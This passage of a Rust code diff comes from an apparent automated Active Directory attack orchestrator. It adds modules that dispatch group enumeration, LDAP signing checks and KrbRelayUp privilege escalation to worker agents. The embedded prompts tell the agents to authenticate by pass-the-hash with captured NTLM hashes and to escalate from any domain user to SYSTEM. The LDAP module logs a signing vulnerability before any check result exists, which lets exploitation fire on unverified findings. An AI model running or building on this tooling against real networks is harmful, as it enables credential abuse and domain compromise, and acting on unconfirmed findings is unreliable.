String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches group enumeration per domain. +/// Interval: 45s. +pub async fn auto_group_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("group_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_group_enum_work(&state) + }; + + if !work.is_empty() { + info!( + count = work.len(), + domains = ?work.iter().map(|w| w.domain.as_str()).collect::>(), + "Group enumeration work items collected" + ); + } + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + // instead of a cross-domain credential that will fail LDAP simple bind. + let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), // empty password forces PTH path + item.domain.clone(), // target domain, not cross-domain + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ", + "username=user, domain=domain, hash=, command='enumdomgroups') — ", + "then for each group RID: 'querygroupmem ' and 'queryuser ' to resolve members.\n", + " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n", + "If a password IS provided, use ldap_search with filter (objectCategory=group) ", + "to enumerate groups, members, and Foreign Security Principals.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ", + "(e.g. credential from child.domain.local querying parent domain.local), ", + "you MUST pass bind_domain= to ldap_search. ", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n", + "For EACH group found, report it as a vulnerability:\n", + " vuln_type: 'group_enumerated'\n", + " target: the group sAMAccountName\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"group_type\": \"Global/DomainLocal/Universal\", ", + "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ", + "\"admin_count\": true/false}\n\n", + "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ", + "Backup Operators, Server Operators, Account Operators, DnsAdmins, ", + "and any custom groups with adminCount=1.\n\n", + "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n", + "IMPORTANT: For each user found, include in discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + // Attach NTLM hash for PTH when no cleartext cred for target domain + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + let priority = dispatcher.effective_priority("group_enumeration"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Group enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "Group enumeration deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration"); + } + } + } + } +} + +struct GroupEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key_cred = format!("group_enum:{}:cred", "contoso.local"); + let key_hash = format!("group_enum:{}:hash", "contoso.local"); + assert_eq!(key_cred, "group_enum:contoso.local:cred"); + assert_eq!(key_hash, "group_enum:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert!(payload["enumerate_members"].as_bool().unwrap()); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "member", + "memberOf", + "managedBy", + "groupType", + "objectSid", + "description", + "cn", + ]; + assert_eq!(attrs.len(), 8); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"objectSid")); + assert!(attrs.contains(&"managedBy")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GroupEnumWork { + dedup_key: "group_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "group_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("group_enum:{}:cred", "contoso.local"); + let key2 = format!("group_enum:{}:cred", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_hash_fires_after_cred_dedup_burned() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Cred-based attempt already dispatched (may have failed) + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + // Add an NTLM hash — should still generate work via hash path + state.hashes.push(ares_core::models::Hash { + id: "h1".into(), + username: "Administrator".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(), + hash_type: "ntlm".into(), + domain: "contoso.local".into(), + source: "secretsdump".into(), + cracked_password: None, + discovered_at: None, + parent_id: None, + aes_key: None, + attack_step: 0, + }); + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "hash path should fire even after cred dedup burned" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash"); + assert!(work[0].ntlm_hash.is_some()); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:hash".into(), + ); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot) + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred"); + } + + #[test] + fn collect_prefers_same_domain_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "localadmin"); + } + + #[test] + fn collect_child_cred_falls_back_for_parent_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Child-domain cred should work for parent-domain via trust + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "child-domain cred should fall back for parent" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust"); + assert_eq!(work[0].credential.domain, "north.contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs new file mode 100644 index 00000000..39c17801 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs @@ -0,0 +1,527 @@ +//! auto_krbrelayup -- exploit KrbRelayUp when LDAP signing is not enforced. +//! +//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing +//! is not required. It creates a computer account (MAQ > 0), relays Kerberos +//! auth to LDAP to set up RBCD on a target, then uses S4U2Self/S4U2Proxy +//! to get a service ticket as admin. This is a local privilege escalation +//! that works from any authenticated domain user to SYSTEM on domain-joined hosts. +//! +//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing), +//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect KrbRelayUp work items from current state. +/// +/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_krbrelayup_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing) + let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| { + let vtype = v.vuln_type.to_lowercase(); + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required" + }); + + if !has_ldap_weak { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target non-DC hosts (priv esc on member servers) + for host in &state.hosts { + if host.is_dc { + continue; + } + + // Skip hosts we already own + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("krbrelayup:{}", host.ip); + if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(KrbRelayUpWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak. +/// Interval: 45s. +pub async fn auto_krbrelayup(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("krbrelayup") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_krbrelayup_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "krbrelayup", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("krbrelayup"); + match dispatcher + .throttled_submit("privesc", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "KrbRelayUp exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "KrbRelayUp deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp"); + } + } + } + } +} + +struct KrbRelayUpWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, VulnerabilityInfo}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_ldap_vuln() -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: "ldap-weak-1".into(), + vuln_type: "ldap_signing_disabled".into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: Default::default(), + recommended_agent: String::new(), + priority: 5, + } + } + + // --- collect_krbrelayup_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_ldap_vuln_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_with_ldap_vuln_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_ldap_signing_not_required_also_triggers() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let mut vuln = make_ldap_vuln(); + vuln.vuln_type = "ldap_signing_not_required".into(); + state.discovered_vulnerabilities.insert("v1".into(), vuln); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_bare_hostname_uses_fallback_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.30", "ws01", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_non_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.31", "srv02.fabrikam.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn dedup_key_format() { + let key = format!("krbrelayup:{}", "192.168.58.22"); + assert_eq!(key, "krbrelayup:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup"); + } + + #[test] + fn ldap_signing_vuln_types() { + let types = ["ldap_signing_disabled", "ldap_signing_not_required"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required", + "{t} should match LDAP weak signing" + ); + } + } + + #[test] + fn non_ldap_vuln_types_rejected() { + let types = ["smb_signing_disabled", "mssql_access"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "krbrelayup", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "krbrelayup"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = KrbRelayUpWork { + dedup_key: "krbrelayup:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn ldap_signing_not_enforced_matches() { + let vtype = "ldap_signing_not_enforced".to_lowercase(); + // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required" + let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"; + assert!( + !matches, + "ldap_signing_not_enforced should NOT match the specific vuln types" + ); + } + + #[test] + fn non_matching_vuln_types() { + let types = [ + "esc1", + "smb_signing_disabled", + "unconstrained_delegation", + "mssql_access", + ]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "ws01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "srv01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs new file mode 100644 index 00000000..21edb00e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs @@ -0,0 +1,428 @@ +//! auto_ldap_signing -- check LDAP signing enforcement per DC. +//! +//! When LDAP signing is not required, attackers can relay NTLM auth to LDAP +//! for shadow credentials, RBCD writes, or account takeover. This module +//! dispatches a check per DC to test whether LDAP channel binding and +//! signing are enforced. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_ldap_signing_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ldap_sign:{}", dc_ip); + if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(LdapSigningWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for LDAP signing and channel binding enforcement. +/// Interval: 45s. +pub async fn auto_ldap_signing(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ldap_signing") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_ldap_signing_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_signing_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "instructions": concat!( + "Check whether LDAP signing is enforced on this Domain Controller.\n\n", + "Use ldap_search or nxc_ldap_command to test LDAP binding. ", + "Try an unsigned LDAP bind (simple bind without signing). ", + "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n", + "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ", + "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n", + "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ", + "you MUST report this as a vulnerability:\n", + " vuln_type: 'ldap_signing_disabled'\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"signing_required\": false, \"channel_binding\": false}\n\n", + "If LDAP signing IS enforced, report finding with finding_type='hardened'." + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("ldap_signing"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key) + .await; + + // Register ldap_signing_disabled vulnerability proactively so + // downstream automations (KrbRelayUp, NTLM relay) can fire + // without waiting for the agent's report_finding callback + // (which only logs and does NOT populate discovered_vulnerabilities). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ldap_signing_disabled".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ldap_signing".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = 